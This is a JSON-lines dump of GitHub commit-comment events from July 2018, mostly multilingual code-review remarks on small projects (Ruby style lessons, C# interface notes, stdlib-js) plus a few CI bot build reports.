{"id":"7987562090","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29760689,"position":11,"line":11,"path":"1.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:13:55Z","updated_at":"2018-07-19T08:13:55Z","author_association":"NONE","body":"Тут и в дальнейшем\r\nрекомендуется использовать пробелы до и после арифметических операторов, операторов сравнения, логических операторов\r\n\r\nпримеры:\r\n```\r\n    b * b # хорошо\r\n    b*b   # плохо\r\n\r\n    a > b # хорошо\r\n    a>b   # плохо\r\n```\r\n```\r\n    a && b # хорошо\r\n    a&&b   # плохо\r\n```\r\nпри этом оператор возведения в степень не рекомендуется выделять пробелами\r\n```\r\n    c**2   # хорошо\r\n    c ** 2 # плохо\r\n```"}},"created_at":"2018-07-19T08:13:55Z"}
{"id":"7987564319","type":"CommitCommentEvent","actor":{"login":"ppdmc"},"repo":{"name":"ppdmc/interface"},"payload":{"comment":{"id":29760694,"position":183,"line":183,"path":"Program.cs","commit_id":"f140deae0951c2adabad570ce770445f53d21e75","created_at":"2018-07-19T08:14:22Z","updated_at":"2018-07-19T08:14:22Z","author_association":"OWNER","body":"158~182 상관없는 클래스처럼 보이지만\r\n필요한 인터페이스를 구현한다면 어떤 클래스든 표시될 수 있다.\r\n\r\n결과적으로 ConsoleListControl.List() 메소드는 전달되는 객체가 어떤것이든 적절하게 표시될 수 있게 다형성에 의존 한다고 한다..."}},"created_at":"2018-07-19T08:14:22Z"}
{"id":"7987566204","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29760696,"position":49,"line":49,"path":"lib/node_modules/@stdlib/stats/incr/cv/README.md","commit_id":"6dd7df93fd2c6e40fd0662844acf8b69b887dcec","created_at":"2018-07-19T08:14:45Z","updated_at":"2018-07-19T08:14:45Z","author_association":"MEMBER","body":"Removed."}},"created_at":"2018-07-19T08:14:45Z"}
{"id":"7987566512","type":"CommitCommentEvent","actor":{"login":"sujirungkul"},"repo":{"name":"sujirungkul/sujirungkul.github.io"},"payload":{"comment":{"id":29760698,"position":null,"line":null,"path":null,"commit_id":"146fe35b1de820ecc0db894507651cd2f2e4eaf8","created_at":"2018-07-19T08:14:48Z","updated_at":"2018-07-19T08:14:48Z","author_association":"OWNER","body":"Okay"}},"created_at":"2018-07-19T08:14:48Z"}
{"id":"7987566807","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29760699,"position":49,"line":49,"path":"lib/node_modules/@stdlib/stats/incr/mcv/README.md","commit_id":"eed6b690d7c37249b04544b3f5fd36ad8eb3187f","created_at":"2018-07-19T08:14:52Z","updated_at":"2018-07-19T08:14:52Z","author_association":"MEMBER","body":"Removed."}},"created_at":"2018-07-19T08:14:52Z"}
{"id":"7987567455","type":"CommitCommentEvent","actor":{"login":"ElenaAbramova"},"repo":{"name":"bitfwdcommunity/Issue-your-own-ERC20-token"},"payload":{"comment":{"id":29760701,"position":null,"line":null,"path":null,"commit_id":"c109cf848e0ec64655a48ebdc7e20cfc4e2392eb","created_at":"2018-07-19T08:15:00Z","updated_at":"2018-07-19T08:15:00Z","author_association":"NONE","body":"This is a code, which was taken from the site https://medium.com/."}},"created_at":"2018-07-19T08:15:00Z"}
{"id":"7987576772","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29760715,"position":15,"line":15,"path":"1.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:16:53Z","updated_at":"2018-07-19T08:16:53Z","author_association":"NONE","body":"Здесь и в многих местах дальше с индентацией проблема. У нас должно быть 2 пробела. И не нужно оставлять пустые строки перед и после else/elsif\r\n```\r\nif something\r\n  do_something\r\nelse\r\n  do_something_else\r\nend\r\n```\r\nТо, что произойдет внутри if, или else блока должно быть проиндентированно на 2 пробела дальше этого самого блока."}},"created_at":"2018-07-19T08:16:53Z"}
{"id":"7987576979","type":"CommitCommentEvent","actor":{"login":"foolishantcat"},"repo":{"name":"foolishantcat/we_e_r_p"},"payload":{"comment":{"id":29760716,"position":43,"line":112,"path":"controllers/SiteController.php","commit_id":"6542f1ae79c399f40bbe0aa9cd2c7012c1d1b80d","created_at":"2018-07-19T08:16:55Z","updated_at":"2018-07-19T08:16:55Z","author_association":"OWNER","body":"这部分已经去掉了“交易管理”，所以，不需要了，只需要订单管理"}},"created_at":"2018-07-19T08:16:55Z"}
{"id":"7987583579","type":"CommitCommentEvent","actor":{"login":"Doncassino"},"repo":{"name":"Doncassino/TriAzur_code"},"payload":{"comment":{"id":29760732,"position":null,"line":null,"path":null,"commit_id":"2cdb11e9c2ae4fac3e84acf76ba052fad66b81fb","created_at":"2018-07-19T08:18:16Z","updated_at":"2018-07-19T08:18:16Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/b09e3ee0-bc62-4bd7-bcf6-7b033dada6af?env_id=ibm%3Ayp%3Aus-south \"TriAzurUE\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/57bc70fc-3a85-4eb7-a477-d1a67ac25fb2?env_id=ibm%3Ayp%3Aus-south \"TriAzurUE\") deployed [TriAzur_code](https://github.com/Doncassino/TriAzur_code/releases/tag/deploy-ibm-yp-eu-gb-TriAzur-TriAzur-20180719-081815 \"deploy-ibm-yp-eu-gb-TriAzur-TriAzur-20180719-081815\") to [TriAzur](https://console.bluemix.net/apps/11b7850a-b04f-4546-975c-fb2662c615cd?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:TriAzur:TriAzur\"), including this commit"}},"created_at":"2018-07-19T08:18:16Z"}
{"id":"7987586774","type":"CommitCommentEvent","actor":{"login":"remicollet"},"repo":{"name":"php-zookeeper/php-zookeeper"},"payload":{"comment":{"id":29760735,"position":null,"line":null,"path":null,"commit_id":"bd8291e23106df5a261edb807587a1a50f383950","created_at":"2018-07-19T08:18:53Z","updated_at":"2018-07-19T08:18:53Z","author_association":"NONE","body":"Please, fix this... this have nothing specific to Fedora.\r\n\r\n +\t* Fix 'undefined symbol: zoo_wgetconfig' with libzookeeper < 3.5 (Issue #22) "}},"created_at":"2018-07-19T08:18:53Z"}
{"id":"7987587106","type":"CommitCommentEvent","actor":{"login":"foolishantcat"},"repo":{"name":"foolishantcat/we_e_r_p"},"payload":{"comment":{"id":29760737,"position":11,"line":11,"path":"models/TradeDao.php","commit_id":"6542f1ae79c399f40bbe0aa9cd2c7012c1d1b80d","created_at":"2018-07-19T08:18:57Z","updated_at":"2018-07-19T08:18:57Z","author_association":"OWNER","body":"现在只有order_id（订单编号），这是上次，你和我两个人商量决定的，去掉交易管理界面"}},"created_at":"2018-07-19T08:18:57Z"}
{"id":"7987589128","type":"CommitCommentEvent","actor":{"login":"PangJaehun"},"repo":{"name":"gangnamjava/java-example"},"payload":{"comment":{"id":29760739,"position":null,"line":null,"path":null,"commit_id":"571b46abe22fd839d6d1344aded4ba0e9977e263","created_at":"2018-07-19T08:19:19Z","updated_at":"2018-07-19T08:19:19Z","author_association":"NONE","body":"혹시 저때문에 중괄호 밑으로 안내리셔도될거같아요 고치는중이라서요\r\nㅋㅋㅋ"}},"created_at":"2018-07-19T08:19:19Z"}
{"id":"7987589712","type":"CommitCommentEvent","actor":{"login":"foolishantcat"},"repo":{"name":"foolishantcat/we_e_r_p"},"payload":{"comment":{"id":29760741,"position":14,"line":14,"path":"models/TradeDao.php","commit_id":"6542f1ae79c399f40bbe0aa9cd2c7012c1d1b80d","created_at":"2018-07-19T08:19:25Z","updated_at":"2018-07-19T08:19:25Z","author_association":"OWNER","body":"这部分已经没有了，按照最新的界面来"}},"created_at":"2018-07-19T08:19:25Z"}
{"id":"7987590254","type":"CommitCommentEvent","actor":{"login":"poofytoo"},"repo":{"name":"jfabi/infotouch"},"payload":{"comment":{"id":29760743,"position":1,"line":1,"path":".gitignore","commit_id":"16bab262c174dd932b5efc126f13614cf0035b9a","created_at":"2018-07-19T08:19:31Z","updated_at":"2018-07-19T08:19:31Z","author_association":"NONE","body":"I'm so proud of you"}},"created_at":"2018-07-19T08:19:31Z"}
{"id":"7987590295","type":"CommitCommentEvent","actor":{"login":"ppdmc"},"repo":{"name":"ppdmc/interface"},"payload":{"comment":{"id":29760744,"position":15,"line":187,"path":"Program.cs","commit_id":"1e5d23acca2178a5d2708217a1257d1a538d13eb","created_at":"2018-07-19T08:19:32Z","updated_at":"2018-07-19T08:19:32Z","author_association":"OWNER","body":"186 구현된 인터페이스는 기본 클래스와 함께 목록으로 콤마로 분리하여 표시한다."}},"created_at":"2018-07-19T08:19:32Z"}
{"id":"7987595658","type":"CommitCommentEvent","actor":{"login":"eszkatya"},"repo":{"name":"cruelnotes/tt-data"},"payload":{"comment":{"id":29760756,"position":8,"line":10,"path":"Python Basics/Basic Control Flow, Loops/ex05_katika.py","commit_id":"bf5c749e9e187e9a8237ed3c3e74ea0614de3148","created_at":"2018-07-19T08:20:31Z","updated_at":"2018-07-19T08:20:31Z","author_association":"COLLABORATOR","body":"Ez egyáltalán nem univerzális, csak kb. arra írtam egy kódot, hogy a pusht gyakoroljam. Ezt javítom"}},"created_at":"2018-07-19T08:20:31Z"}
{"id":"7987595780","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29760757,"position":3,"line":3,"path":"2.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:20:33Z","updated_at":"2018-07-19T08:20:33Z","author_association":"NONE","body":"Значение могут быть не целыми. Нужно использовать to_f, потому-что может выйти не правильный результат при делении\r\n```\r\n2.5.0 :002 > 3 / 2\r\n => 1\r\n2.5.0 :003 > 3.to_f / 2\r\n => 1.5\r\n2.5.0 :004 >\r\n```\r\n"}},"created_at":"2018-07-19T08:20:33Z"}
{"id":"7987596368","type":"CommitCommentEvent","actor":{"login":"Kyushik"},"repo":{"name":"MLJejuCamp2017/DRL_based_SelfDrivingCarControl"},"payload":{"comment":{"id":29760758,"position":null,"line":null,"path":null,"commit_id":"c81b831bf59675a0607a62d032f76bec8c3648f6","created_at":"2018-07-19T08:20:40Z","updated_at":"2018-07-19T08:20:40Z","author_association":"COLLABORATOR","body":"Score is in the Training part as \r\n\r\n`    # Update information\r\n    step += 1\r\n    score += reward\r\n    step_per_episode += 1`\r\n\r\nAlso, the reward is from simulator.  You can check specific setting of reward at the readme.md ! :) "}},"created_at":"2018-07-19T08:20:40Z"}
{"id":"7987598875","type":"CommitCommentEvent","actor":{"login":"foolishantcat"},"repo":{"name":"foolishantcat/we_e_r_p"},"payload":{"comment":{"id":29760764,"position":10,"line":10,"path":"publicUtil/Util.php","commit_id":"6542f1ae79c399f40bbe0aa9cd2c7012c1d1b80d","created_at":"2018-07-19T08:21:12Z","updated_at":"2018-07-19T08:21:12Z","author_association":"OWNER","body":"还有几个函数，也弄进来，比如，算当前月的起止时间"}},"created_at":"2018-07-19T08:21:12Z"}
{"id":"7987599968","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29760767,"position":3,"line":3,"path":"2.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:21:26Z","updated_at":"2018-07-19T08:21:26Z","author_association":"NONE","body":"И писал уже про говорящие названия. Тут лучше назвать переменные base, height и area"}},"created_at":"2018-07-19T08:21:26Z"}
{"id":"7987600198","type":"CommitCommentEvent","actor":{"login":"CorinaAlb"},"repo":{"name":"easyonboard/onboarder"},"payload":{"comment":{"id":29760768,"position":null,"line":null,"path":null,"commit_id":"363cd66f6aeed9a58c63f6188601951d794b44b6","created_at":"2018-07-19T08:21:29Z","updated_at":"2018-07-19T08:21:29Z","author_association":"COLLABORATOR","body":"De ce ai sters si serviciile de tutorial? :( "}},"created_at":"2018-07-19T08:21:29Z"}
{"id":"7987605968","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"videolan/vlc"},"payload":{"comment":{"id":29760780,"position":24,"line":1749,"path":"src/input/es_out.c","commit_id":"cfea200c8c7596de07d9e4b7bb88f993015939be","created_at":"2018-07-19T08:22:39Z","updated_at":"2018-07-19T08:22:39Z","author_association":"CONTRIBUTOR","body":"yes, good catch"}},"created_at":"2018-07-19T08:22:39Z"}
{"id":"7987607114","type":"CommitCommentEvent","actor":{"login":"ppdmc"},"repo":{"name":"ppdmc/interface"},"payload":{"comment":{"id":29760781,"position":29,"line":201,"path":"Program.cs","commit_id":"1e5d23acca2178a5d2708217a1257d1a538d13eb","created_at":"2018-07-19T08:22:53Z","updated_at":"2018-07-19T08:22:53Z","author_association":"OWNER","body":"200 암시적 인터페이스의 구현형식은 public\r\n"}},"created_at":"2018-07-19T08:22:53Z"}
{"id":"7987607184","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29760782,"position":74,"line":74,"path":"lib/node_modules/@stdlib/stats/incr/mpcorr2/test/test.js","commit_id":"e6bc812ab63010afd0f25418c0c6954c3a680357","created_at":"2018-07-19T08:22:54Z","updated_at":"2018-07-19T08:22:54Z","author_association":"MEMBER","body":"Awesome, thanks!"}},"created_at":"2018-07-19T08:22:54Z"}
{"id":"7987607442","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29760783,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-19T08:22:57Z","updated_at":"2018-07-19T08:22:57Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2321 of 2322 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.18%25-green.png)</a>\n"}},"created_at":"2018-07-19T08:22:57Z"}
{"id":"7987613061","type":"CommitCommentEvent","actor":{"login":"peterhinch"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":29760796,"position":null,"line":null,"path":null,"commit_id":"4b6bbbd134d88588319bf783233d9f46f5134d76","created_at":"2018-07-19T08:24:04Z","updated_at":"2018-07-19T08:24:04Z","author_association":"CONTRIBUTOR","body":"> I guess that Windows and Mac will complain about an invalid filesystem\r\n\r\nOn any OS mounting the onboard filesystem is a can of worms because of the limitations of USB: sooner or later the user gets corruption and wonders why. I think MSC mode should be discouraged (and not be the default) for the same reason."}},"created_at":"2018-07-19T08:24:04Z"}
{"id":"7987639860","type":"CommitCommentEvent","actor":{"login":"akanksha-96"},"repo":{"name":"akanksha-96/javaWallet"},"payload":{"comment":{"id":29760853,"position":null,"line":null,"path":null,"commit_id":"5d1f128d983912712ab16672f61c13ff2e3f958d","created_at":"2018-07-19T08:29:25Z","updated_at":"2018-07-19T08:29:25Z","author_association":"OWNER","body":"using collections"}},"created_at":"2018-07-19T08:29:25Z"}
{"id":"7987640185","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29760854,"position":127,"line":127,"path":"lib/node_modules/@stdlib/stats/incr/mmeanvar/lib/main.js","commit_id":"72b0cab6fdab2e6316a290618a0a55fd6dad5e66","created_at":"2018-07-19T08:29:28Z","updated_at":"2018-07-19T08:29:28Z","author_association":"MEMBER","body":"Okay, fine with me. And yeah, was aware that the code works as-is, which is why I only referred to the code highlighting issue (which not only applies to my editor, but also on GitHub)."}},"created_at":"2018-07-19T08:29:28Z"}
{"id":"7987640284","type":"CommitCommentEvent","actor":{"login":"CorinaAlb"},"repo":{"name":"easyonboard/onboarder"},"payload":{"comment":{"id":29760855,"position":2,"line":4,"path":"client/angular-front/src/app/service/tutorial.service.ts","commit_id":"363cd66f6aeed9a58c63f6188601951d794b44b6","created_at":"2018-07-19T08:29:29Z","updated_at":"2018-07-19T08:29:29Z","author_association":"COLLABORATOR","body":"nuuuuuu\r\nRIP tutorial service :((("}},"created_at":"2018-07-19T08:29:29Z"}
{"id":"7987641053","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29760860,"position":4,"line":4,"path":"3.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:29:38Z","updated_at":"2018-07-19T08:29:38Z","author_association":"NONE","body":"У нас тут нет гарантии, что \"с\" будет самой длинной стороной. Хорошо бы это определить сначала.\r\nЗнаю, что мы не учили массивы, но рекомендую использовать тут массив. Его легко отсортировать используя метод sort.\r\n```\r\nsides = [a, b, c].sort!\r\n```"}},"created_at":"2018-07-19T08:29:38Z"}
{"id":"7987641359","type":"CommitCommentEvent","actor":{"login":"hirshbergshachar"},"repo":{"name":"demisto/content"},"payload":{"comment":{"id":29760861,"position":5,"line":189,"path":"Integrations/integration-EWSv2.yml","commit_id":"2cb9342332a22d069ee701d93540d9f457d2d8d9","created_at":"2018-07-19T08:29:41Z","updated_at":"2018-07-19T08:29:41Z","author_association":"CONTRIBUTOR","body":"@BenJoParadise Pythonically speaking, it is recommended by PEP-8 to use `var is None` vs `var == None`\r\n```\"Comparisons to singletons like None should always be done with is or is not, never the equality operators.\"```"}},"created_at":"2018-07-19T08:29:41Z"}
{"id":"7987641791","type":"CommitCommentEvent","actor":{"login":"chengliangteacher"},"repo":{"name":"chengliangteacher/last-project"},"payload":{"comment":{"id":29760863,"position":null,"line":null,"path":null,"commit_id":"d2dcbf46b478c830e1940b393800404aae7672db","created_at":"2018-07-19T08:29:46Z","updated_at":"2018-07-19T08:29:46Z","author_association":"OWNER","body":"非常好"}},"created_at":"2018-07-19T08:29:46Z"}
{"id":"7987642756","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29760869,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-19T08:29:58Z","updated_at":"2018-07-19T08:29:58Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-19T08:29:58Z"}
{"id":"7987643098","type":"CommitCommentEvent","actor":{"login":"chengliangteacher"},"repo":{"name":"chengliangteacher/last-project"},"payload":{"comment":{"id":29760872,"position":null,"line":null,"path":null,"commit_id":"d2dcbf46b478c830e1940b393800404aae7672db","created_at":"2018-07-19T08:30:02Z","updated_at":"2018-07-19T08:30:02Z","author_association":"OWNER","body":"谢谢程老师"}},"created_at":"2018-07-19T08:30:02Z"}
{"id":"7987644218","type":"CommitCommentEvent","actor":{"login":"zombieJ"},"repo":{"name":"react-component/tree-select"},"payload":{"comment":{"id":29760878,"position":null,"line":null,"path":null,"commit_id":"bda443440427032f959ed10a3d70cc26108bb414","created_at":"2018-07-19T08:30:16Z","updated_at":"2018-07-19T08:30:16Z","author_association":"MEMBER","body":"ref: https://github.com/ant-design/ant-design/issues/8423"}},"created_at":"2018-07-19T08:30:16Z"}
{"id":"7987647801","type":"CommitCommentEvent","actor":{"login":"renemilk"},"repo":{"name":"pymor/pymor"},"payload":{"comment":{"id":29760889,"position":null,"line":null,"path":null,"commit_id":"55374b7e26d6b18cf79df0c279aa7c007b070e98","created_at":"2018-07-19T08:30:57Z","updated_at":"2018-07-19T08:30:57Z","author_association":"MEMBER","body":"I just saw that's not the email/name recorded with the commits, should we .mailmap that?"}},"created_at":"2018-07-19T08:30:57Z"}
{"id":"7987648032","type":"CommitCommentEvent","actor":{"login":"OrenMe"},"repo":{"name":"kaltura/mwEmbed"},"payload":{"comment":{"id":29760890,"position":5,"line":946,"path":"resources/mediawiki/mediawiki.js","commit_id":"014a40e6dc4efffc98dab13f1d785149a8d34ccd","created_at":"2018-07-19T08:30:59Z","updated_at":"2018-07-19T08:30:59Z","author_association":"COLLABORATOR","body":"fixed in #3873"}},"created_at":"2018-07-19T08:30:59Z"}
{"id":"7987651917","type":"CommitCommentEvent","actor":{"login":"TeiXeR"},"repo":{"name":"Ludeon/RimWorld-de"},"payload":{"comment":{"id":29760899,"position":null,"line":null,"path":null,"commit_id":"efc8cdad34af0fe3015985e1a8198ac3fcd4d582","created_at":"2018-07-19T08:31:45Z","updated_at":"2018-07-19T08:31:45Z","author_association":"CONTRIBUTOR","body":"Cool, danke!\r\nNatürlich werde ich trotzdem weiter mithelfen! ;)"}},"created_at":"2018-07-19T08:31:45Z"}
{"id":"7987655916","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29760904,"position":36,"line":36,"path":"3.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:32:30Z","updated_at":"2018-07-19T08:32:30Z","author_association":"NONE","body":"Проверку на равносторонность можно вынести выше как отдельный иф стэйтмэнт, и если она вернет правду - прекратить выполнение программы. Потому-что равносторонний треугольник не будет прямоугольным и лучше избежать дальнейших вычислений"}},"created_at":"2018-07-19T08:32:30Z"}
{"id":"7987666166","type":"CommitCommentEvent","actor":{"login":"che11"},"repo":{"name":"thinnect/tos-platforms"},"payload":{"comment":{"id":29760929,"position":null,"line":null,"path":null,"commit_id":"8ed7e5f6c976c0ce5c742206374aa091a435d31a","created_at":"2018-07-19T08:34:31Z","updated_at":"2018-07-19T08:34:31Z","author_association":"NONE","body":"hello, maybe you can help me, in which repo can i find drivers for rfr2? \r\nthanks, Elena"}},"created_at":"2018-07-19T08:34:31Z"}
{"id":"7987666296","type":"CommitCommentEvent","actor":{"login":"lwierzbi"},"repo":{"name":"lwierzbi/radio-pi"},"payload":{"comment":{"id":29760930,"position":null,"line":null,"path":null,"commit_id":"2915b0b3c461c9e597dd429dce68929da342f13a","created_at":"2018-07-19T08:34:33Z","updated_at":"2018-07-19T08:34:33Z","author_association":"OWNER","body":"comment4"}},"created_at":"2018-07-19T08:34:33Z"}
{"id":"7987667074","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29760932,"position":43,"line":43,"path":"3.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:34:42Z","updated_at":"2018-07-19T08:34:42Z","author_association":"NONE","body":"И везде нужно будет поправить индентацию и убрать лишние пустые строки, как я говорил в предыдущих коментах"}},"created_at":"2018-07-19T08:34:42Z"}
{"id":"7987669281","type":"CommitCommentEvent","actor":{"login":"mastum"},"repo":{"name":"openwrt/luci"},"payload":{"comment":{"id":29760938,"position":null,"line":null,"path":null,"commit_id":"39cabc03611369d7cb421b5fcff90ce20d9d51c4","created_at":"2018-07-19T08:35:09Z","updated_at":"2018-07-19T08:35:09Z","author_association":"NONE","body":"Thanks for this commit.\r\n@jow it would be great if it were also included in the 18.06 branch."}},"created_at":"2018-07-19T08:35:09Z"}
{"id":"7987670058","type":"CommitCommentEvent","actor":{"login":"rdubigny"},"repo":{"name":"betagouv/signup-front"},"payload":{"comment":{"id":29760940,"position":null,"line":null,"path":null,"commit_id":"8694647aacf6961aa62237ca4baf1314a6d3da04","created_at":"2018-07-19T08:35:17Z","updated_at":"2018-07-19T08:35:17Z","author_association":"MEMBER","body":"running npm i --production will produce this package-lock.json (ie. with no dev dependencies)\r\n\r\nif we use a package-lock.json we have the following error when trying to install npm dependencies:\r\n\r\n```text\r\nUnsupported platform for fsevents\r\n```\r\n\r\nthis may be related to https://github.com/yarnpkg/yarn/issues/1285#issuecomment-257634450"}},"created_at":"2018-07-19T08:35:17Z"}
{"id":"7987676542","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29760952,"position":3,"line":3,"path":"4.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:36:32Z","updated_at":"2018-07-19T08:36:32Z","author_association":"NONE","body":"Могут быть не целые числа"}},"created_at":"2018-07-19T08:36:32Z"}
{"id":"7987679040","type":"CommitCommentEvent","actor":{"login":"ppdmc"},"repo":{"name":"ppdmc/interface"},"payload":{"comment":{"id":29760959,"position":16,"line":345,"path":"Program.cs","commit_id":"ea86738b5fa90b63cd662da1654fcd7a8648c991","created_at":"2018-07-19T08:37:01Z","updated_at":"2018-07-19T08:37:01Z","author_association":"OWNER","body":"344 멤버가 없는 인터페잇는 드물다 하지만 \r\n읽어로기 기능을 제공 하지 않고 IWriteableSettingsProvider를 구현할 수 있다."}},"created_at":"2018-07-19T08:37:01Z"}
{"id":"7987679528","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29760960,"position":13,"line":13,"path":"4.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:37:07Z","updated_at":"2018-07-19T08:37:07Z","author_association":"NONE","body":"скобки тут все лишние. пробелы вокруг оператора умножения, как я писал выше"}},"created_at":"2018-07-19T08:37:07Z"}
{"id":"7987681740","type":"CommitCommentEvent","actor":{"login":"rodrigobdz"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29760967,"position":null,"line":null,"path":null,"commit_id":"6110a4cc75bf8f285ff091cc175b9ebf737f88fc","created_at":"2018-07-19T08:37:33Z","updated_at":"2018-07-19T08:37:33Z","author_association":"NONE","body":"Is the fix going to be included in the august release?"}},"created_at":"2018-07-19T08:37:33Z"}
{"id":"7987684463","type":"CommitCommentEvent","actor":{"login":"qyf94"},"repo":{"name":"qyf94/vue-scratchcard"},"payload":{"comment":{"id":29760975,"position":null,"line":null,"path":null,"commit_id":"c7fe227b3d799c938b685ecdfefb705e70c64c0b","created_at":"2018-07-19T08:38:05Z","updated_at":"2018-07-19T08:38:05Z","author_association":"OWNER","body":"谢谢提醒啊，刚刚才配置好"}},"created_at":"2018-07-19T08:38:05Z"}
{"id":"7987686113","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29760981,"position":13,"line":13,"path":"4.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:38:23Z","updated_at":"2018-07-19T08:38:23Z","author_association":"NONE","body":"Да и переменные мы называем с маленькой буквы. С большой буквы будут называться классы и константы. Это конвенция принятая в руби"}},"created_at":"2018-07-19T08:38:23Z"}
{"id":"7987688036","type":"CommitCommentEvent","actor":{"login":"ppdmc"},"repo":{"name":"ppdmc/interface"},"payload":{"comment":{"id":29760985,"position":22,"line":363,"path":"Program.cs","commit_id":"ae115aace6e4edd7e4a560f082b5f711a101369f","created_at":"2018-07-19T08:38:46Z","updated_at":"2018-07-19T08:38:46Z","author_association":"OWNER","body":"363 인터페이스 암시적 변환"}},"created_at":"2018-07-19T08:38:46Z"}
{"id":"7987692145","type":"CommitCommentEvent","actor":{"login":"nafg"},"repo":{"name":"logstash/logstash-logback-encoder"},"payload":{"comment":{"id":29760994,"position":31,"line":31,"path":"src/main/java/net/logstash/logback/marker/LogstashBasicMarker.java","commit_id":"732b210ec81a7dc44474297f3854b344c8791bcb","created_at":"2018-07-19T08:39:34Z","updated_at":"2018-07-19T08:39:34Z","author_association":"NONE","body":"typo"}},"created_at":"2018-07-19T08:39:34Z"}
